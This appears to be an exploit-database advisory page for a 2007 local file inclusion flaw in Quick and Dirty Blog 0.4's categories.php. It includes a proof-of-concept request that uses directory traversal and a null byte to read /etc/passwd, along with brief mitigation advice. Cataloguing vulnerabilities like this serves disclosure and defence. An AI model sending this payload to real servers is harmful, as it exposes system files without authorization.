header-logo
Suggest Exploit
vendor:
Quick and Dirty Blog
by:
Unknown
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: Quick and Dirty Blog
Affected Version From: 0.4
Affected Version To: 0.4
Patch Exists: NO
Related CWE: Not provided
CPE: a:quick_and_dirty_blog:quick_and_dirty_blog:0.4
Metasploit:
Other Scripts:
Platforms Tested: Not provided
2007

Quick and Dirty Blog 0.4 (categories.php) Local File Inclusion Vulnerability

The Quick and Dirty Blog version 0.4 is vulnerable to a Local File Inclusion vulnerability. By manipulating the 'theme' parameter in the 'categories.php' file, an attacker can include arbitrary files from the server. An attacker can exploit this vulnerability to read sensitive files like '/etc/passwd'.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of Quick and Dirty Blog that includes a patch for this vulnerability. Additionally, access controls should be implemented to restrict unauthorized access to sensitive files.
Source

Exploit-DB raw data:

Quick and Dirty Blog 0.4 (categories.php) Local File Inclusion Vulnerability
http://heanet.dl.sourceforge.net/sourceforge/qdblog/qdblog-0.4.tar.bz2
POC:
  /categories.php?theme=../../../../../../../../../etc/passwd%00

# milw0rm.com [2007-11-03]

Navigation

Suggest Exploit

Services By CQR